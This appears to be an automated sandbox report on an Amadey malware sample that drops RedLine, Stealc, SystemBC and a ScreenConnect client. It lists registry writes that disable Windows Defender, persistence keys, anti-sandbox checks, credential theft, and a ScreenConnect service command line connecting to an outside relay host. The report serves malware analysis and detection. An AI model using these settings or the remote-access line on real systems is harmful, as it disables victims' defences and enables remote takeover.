amadey | 1824be1799f0c32c14c5fcb3c5d34c98b9fb4d2b867067b8ddc3d129783812fe

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	Process not Found

Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs

defense_evasion trojan

Modify Registry

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	Process not Found

Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs

evasion trojan

Modify Registry

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	Process not Found

Modifies Windows Defender notification settings 3 TTPs 2 IoCs

defense_evasion trojan

Windows Service

Modify Registry

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1"	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications	Process not Found

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 1 IoCs

resource	yara_rule
behavioral15/memory/3340-267-0x00000188BA970000-0x00000188BA9C2000-memory.dmp	family_redline

Redline family
redline
Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc
SystemBC
SystemBC is a proxy and remote administration tool first seen in 2019.
trojan systembc
Systembc family
systembc

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 10 IoCs

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Process not Found
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Process not Found
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Process not Found
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	2v5527.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	3b39d.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Process not Found
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Process not Found
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Process not Found
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Process not Found
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Process not Found

Blocklisted process makes network request 2 IoCs

flow	pid	Process
134	129624	Process not Found
137	142248	Process not Found

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
140968	Process not Found
138956	Process not Found
140112	Process not Found
129624	Process not Found
142248	Process not Found

Downloads MZ/PE file 16 IoCs

flow	pid	Process
46	3228	rapes.exe
46	3228	rapes.exe
46	3228	rapes.exe
46	3228	rapes.exe
46	3228	rapes.exe
46	3228	rapes.exe
46	3228	rapes.exe
46	3228	rapes.exe
46	3228	rapes.exe
46	3228	rapes.exe
46	3228	rapes.exe
46	3228	rapes.exe
46	3228	rapes.exe
134	129624	Process not Found
137	142248	Process not Found
142	145836	Process not Found

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (3be09d9e5e840c20)\ImagePath = "\"C:\\Program Files (x86)\\ScreenConnect Client (3be09d9e5e840c20)\\ScreenConnect.ClientService.exe\" \"?e=Access&y=Guest&h=bbcnas2.zapto.org&p=8041&s=5e07fdea-2445-4cdf-b446-9468459e62fc&k=BgIAAACkAABSU0ExAAgAAAEAAQBdpn0O4B1VqMLUD0QDsNyYTlq4tRTm9ACUnnSMesFZALDh%2bLgBUwyTJ9D684SXejMRZmxv0Ws0vI2HDF%2f3pgx%2bIGwSyAZ%2fcl0w71rKbKyIIKYDZKbnkGgXvWGAi3ZyQp5OOPPQACb3KOn3dbHGC7zVR4YxQG18q4ph%2fyqoczab4g1p0ctN9m9IinVuQ4spX2nQNInOfCqxjvWdinItao7pk9fPOEV6qP3zSVfOwlnLHbRaASXeN%2fudvdB8e5o68h%2bjKG6VwXtszNJDCo7VtQqZmoYLmAVq9dmcJjckjVt0p%2bJPysj6usBrEV3AzT%2ff7W%2bYHYQ0svZBekSGOWFY8kLf&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAHb%2bs1pY9TUyROCm01HafegAAAAACAAAAAAAQZgAAAAEAACAAAAABQhqPewHQ8XlRhI0oneysKXh4DGzBUqONYoTSr%2bO6DQAAAAAOgAAAAAIAACAAAADEoC%2fLK3a1j91yLilSRur3hMPwFboE691x4m7xXSVe7KAEAACoNsZ%2f77gmKCEE91ZoKUHXAnjziW7eiTlFM6DHqLWZIM14v%2bgkf297bTIX4pjnToafPGf5SMsELVph4dmBKDnwVRERrXJqWaz07Zq4sQIBelC9Cb3Ub0Jf%2fqvtBqtQ%2bz9JnM7vN%2f4q4MwB6zE9apFFiZec1p%2fPltAGLFJwpDRVHRAe%2b9zt7mVKPr2dwWijC8FI6ItGIezl2BXNtYQj1Z5iYp7LJeBddoIn2AyaMhQKPcmrRqoA4Vh1ZS9uM50mvYqZV0fvq5cNbt45k2pczFtFa3L4xGO7BxuHB%2fQqGzva5x4nIxoKCCC1%2fOSvFUHSb3J2egDxvBIDn5sxPG%2bcd3DQQKrUtiUFQGYcqWx4tXABYgFshfkbTZ5gOJRCY5zmZSMHpFq5mwoCQv2JHzf2OQEuYDCF9TX3E6DAzpNlIbCVzPcsni30KxCDMR58kEDsij%2f0hzZvuHRbypCAW8K8QoOfGkku9PKMWAt823%2fn%2f%2bBxxUyHOEkZwKrL1nkj7Kkcn%2bLKHaaszB0dQZDFWtzSIaGIjswJoSOrecjsS8Fpdhi1b4FDm%2fK5IIMkOT0RyaVPjDBbBlxk3jzbqZhOPoEgAzZnaQoYVMSiZojgXhJF%2bFpIfvCzb2xvYyd9IvQfmczJ%2b3cEqqb6rdOij8G4zmu7vJrH0JOyQWLOCMeZCa7L88TcuDfJNdyt4ZcwZA5JiVnsDxQnSkdO%2f%2bi8fGqjmZt1XQy7qDHzdg9VYEopUnrhzWgUy7L7ImFgr7YC1CswwrkrCILxLLXtGK6s5O%2bp2luXRvppeh7jLSAW5u%2buk%2fZyXf1lKxc4oOFUevNzrNi58u%2bXm3YahJhyTV0QSleh1fhpMsTbxnASVeURZ2DEgeHmapBib7dNbdNcSdZO45u8%2fu94ClF5wRgU77wGftsX84nSLgw19JFgKWB2xc0KCk9B%2feND4%2bIQuIL3AIhtLn9kKJcvK%2bGzwOaFX4gHuHUr3zclC665Fv8%2fJhwikf4mIsyVqR0E1jT0kembb7SSqSq6cQUxiKtlfX5LkBfcsOMuysbPorwWZTMGWwevZYcamVVhzQB1%2fSxw4vzbiXQEKMzF3lhEZgQ1pMDsvzSBjGAEa7gvAi23LYcWutRUqr82EZiGONsKyH2xe46lVDUmwMHw0jS753PEpp8XaP5Ki4%2fnJco7W8bMOmDd4MrOjgzjtSkGlJZFih7spsQ3OTr44v%2fdQ%2fHtoLz3HSMOmPNMTL0Oi1775lfmAIYUnlYenGtuCcYDFU9VUdDPifWFqHgsvXsIX%2bz3nq%2f37B0Ya9xv%2fdTXDSaiX2GlEzM4JsMyZOeWRgBAVH0xw%2f%2fNJm91RjNeIO9XE4EXCI4XIAtOmeYKcb%2bidvXXecM2l%2fD6kZTKOKKMKzMabYMlPyPxHCkkZ%2bmwf9WXHp%2bbhIwNtZt%2bwUZbCMUAeubBWjwxcrpYKCLFA0ueZvNKaRfk4BX%2bcqVrsmaPH6GjYLadGGotL4xTpj0868Ilx%2b3EG2e8Z98hofyOYqPCyhld7dCiEXR8C8PrS797YJI%2feOtoKhDjett5xxZIuHpf6AtVo8gJK8q5%2fJqzO%2fUcQWwfsGpTDUAAAABRSozwxK4n6B5CeWmqReXZeC8ynYM09Ms9E1GZ442mc7kRZvcawMas%2fW%2fhXd%2fnhjO%2fW14gSFpXFeK7YUP0VkNC&c=test&c=&c=&c=&c=&c=&c=&c=\""	ScreenConnect.ClientService.exe

Checks BIOS information in registry 2 TTPs 20 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	2v5527.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	2v5527.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	3b39d.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	3b39d.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Process not Found

Checks computer location settings 2 TTPs 7 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation	1W41I9.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation	rapes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation	67e0HNq.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation	Process not Found

Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
persistence privilege_escalation

Component Object Model Hijacking
T1546.015

Executes dropped EXE 64 IoCs

pid	Process
3516	P0p33.exe
5064	1W41I9.exe
3228	rapes.exe
2292	2v5527.exe
4680	3b39d.exe
5052	6NPpGdC.exe
1764	6NPpGdC.exe
4088	VBUN8fn.exe
4476	67e0HNq.exe
3340	xqWgymz.exe
3088	ScreenConnect.ClientService.exe
992	ScreenConnect.WindowsClient.exe
3040	ScreenConnect.WindowsClient.exe
3920	Dyshh8M.exe
1232	Dyshh8M.exe
4272	Dyshh8M.exe
4352	Dyshh8M.exe
4540	Dyshh8M.exe
4688	Dyshh8M.exe
396	Dyshh8M.exe
4432	Dyshh8M.exe
3184	Dyshh8M.exe
3640	Dyshh8M.exe
5064	Dyshh8M.exe
432	Dyshh8M.exe
3912	Dyshh8M.exe
1944	Dyshh8M.exe
828	Dyshh8M.exe
1316	Dyshh8M.exe
4368	Dyshh8M.exe
2228	Dyshh8M.exe
4800	Dyshh8M.exe
2588	Dyshh8M.exe
4212	Dyshh8M.exe
1444	Dyshh8M.exe
1456	Dyshh8M.exe
5028	Dyshh8M.exe
5048	Dyshh8M.exe
856	Dyshh8M.exe
3144	Dyshh8M.exe
2424	Dyshh8M.exe
4828	Dyshh8M.exe
3620	Dyshh8M.exe
4064	Dyshh8M.exe
2888	Dyshh8M.exe
1128	Dyshh8M.exe
4380	Dyshh8M.exe
5036	Dyshh8M.exe
1588	Dyshh8M.exe
2372	Dyshh8M.exe
4240	Dyshh8M.exe
2740	Dyshh8M.exe
4340	Dyshh8M.exe
3384	Dyshh8M.exe
3608	Dyshh8M.exe
736	Dyshh8M.exe
368	Dyshh8M.exe
1600	Dyshh8M.exe
5124	Dyshh8M.exe
5132	Dyshh8M.exe
5140	Dyshh8M.exe
5148	Dyshh8M.exe
5156	Dyshh8M.exe
5164	Dyshh8M.exe

Identifies Wine through registry keys 2 TTPs 10 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine	Process not Found
Key opened	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine	Process not Found
Key opened	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine	Process not Found
Key opened	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine	Process not Found
Key opened	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine	Process not Found
Key opened	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine	Process not Found
Key opened	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine	Process not Found
Key opened	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine	2v5527.exe
Key opened	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine	3b39d.exe
Key opened	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine	Process not Found

Loads dropped DLL 22 IoCs

pid	Process
3768	MsiExec.exe
4064	rundll32.exe
4064	rundll32.exe
4064	rundll32.exe
4064	rundll32.exe
4064	rundll32.exe
4064	rundll32.exe
4064	rundll32.exe
4064	rundll32.exe
4064	rundll32.exe
4400	MsiExec.exe
32	MsiExec.exe
3088	ScreenConnect.ClientService.exe
3088	ScreenConnect.ClientService.exe
3088	ScreenConnect.ClientService.exe
3088	ScreenConnect.ClientService.exe
3088	ScreenConnect.ClientService.exe
3088	ScreenConnect.ClientService.exe
3088	ScreenConnect.ClientService.exe
3088	ScreenConnect.ClientService.exe
3088	ScreenConnect.ClientService.exe
3088	ScreenConnect.ClientService.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Windows security modification 2 TTPs 2 IoCs

defense_evasion trojan

Disable or Modify Tools

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	Process not Found

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 7 IoCs

persistence

Registry Run Keys / Startup Folder

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	download.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	P0p33.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\4284dc1285.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10035810101\\4284dc1285.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10035820121\\am_no.cmd"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\c0fb027e93.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10036490101\\c0fb027e93.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\325e33a3f3.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10036500101\\325e33a3f3.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\a68f071a5f.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10036510101\\a68f071a5f.exe"	rapes.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

persistence privilege_escalation

description	ioc	Process
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral15/files/0x000e000000023bde-349.dat	autoit_exe
behavioral15/files/0x0007000000023df4-516.dat	autoit_exe

Boot or Logon Autostart Execution: Authentication Package 1 TTPs 1 IoCs

Suspicious Windows Authentication Registry Modification.

Authentication Package

T1547.002

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\Authentication Packages = 6d007300760031005f003000000043003a005c00500072006f006700720061006d002000460069006c00650073002000280078003800360029005c00530063007200650065006e0043006f006e006e00650063007400200043006c00690065006e00740020002800330062006500300039006400390065003500650038003400300063003200300029005c00530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f0077007300410075007400680065006e007400690063006100740069006f006e005000610063006b006100670065002e0064006c006c0000000000	msiexec.exe

Drops file in System32 directory 3 IoCs

description	ioc	Process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log	ScreenConnect.WindowsClient.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3be09d9e5e840c20)\zvpiqfek.tmp	ScreenConnect.ClientService.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3be09d9e5e840c20)\zvpiqfek.newcfg	ScreenConnect.ClientService.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs

pid	Process
2292	2v5527.exe
4680	3b39d.exe
144556	Process not Found
145836	Process not Found
160076	Process not Found
166548	Process not Found
197036	Process not Found
198316	Process not Found
213508	Process not Found
6432	Process not Found

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 5052 set thread context of 1764	5052	6NPpGdC.exe	102
PID 47720 set thread context of 47916	47720	Process not Found	5529

Drops file in Program Files directory 19 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe.config	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsFileManager.exe.config	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\Client.Override.en-US.resources	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\Client.resources	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\system.config	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsBackstageShell.exe	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsCredentialProvider.dll	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\app.config	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\Client.Override.resources	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.Client.dll	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsBackstageShell.exe.config	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsFileManager.exe	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.dll	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.Core.dll	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.Windows.dll	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsAuthenticationPackage.dll	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\Client.en-US.resources	msiexec.exe

Drops file in Windows directory 16 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Installer\e589d25.msi	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File created	C:\Windows\Installer\e589d27.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\{933D173F-6496-0F7D-53C4-FF46268B901A}\DefaultIcon	msiexec.exe
File created	C:\Windows\Tasks\rapes.job	1W41I9.exe
File opened for modification	C:\Windows\Installer\MSI9E2F.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIA17D.tmp	msiexec.exe
File created	C:\Windows\Installer\e589d25.msi	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File created	C:\Windows\Installer\wix{933D173F-6496-0F7D-53C4-FF46268B901A}.SchedServiceConfig.rmi	MsiExec.exe
File created	C:\Windows\Installer\{933D173F-6496-0F7D-53C4-FF46268B901A}\DefaultIcon	msiexec.exe
File created	C:\Windows\Tasks\Gxtuum.job	Process not Found
File created	C:\Windows\Tasks\Test Task17.job	Process not Found
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\Installer\SourceHash{933D173F-6496-0F7D-53C4-FF46268B901A}	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI9E5F.tmp	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 3 IoCs

pid	pid_target	Process	procid_target
1460	5052	WerFault.exe	101
47228	47720	Process not Found	5508
246732	3920	Process not Found	131

System Location Discovery: System Language Discovery 1 TTPs 54 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ScreenConnect.ClientService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	P0p33.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	6NPpGdC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1W41I9.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	6NPpGdC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
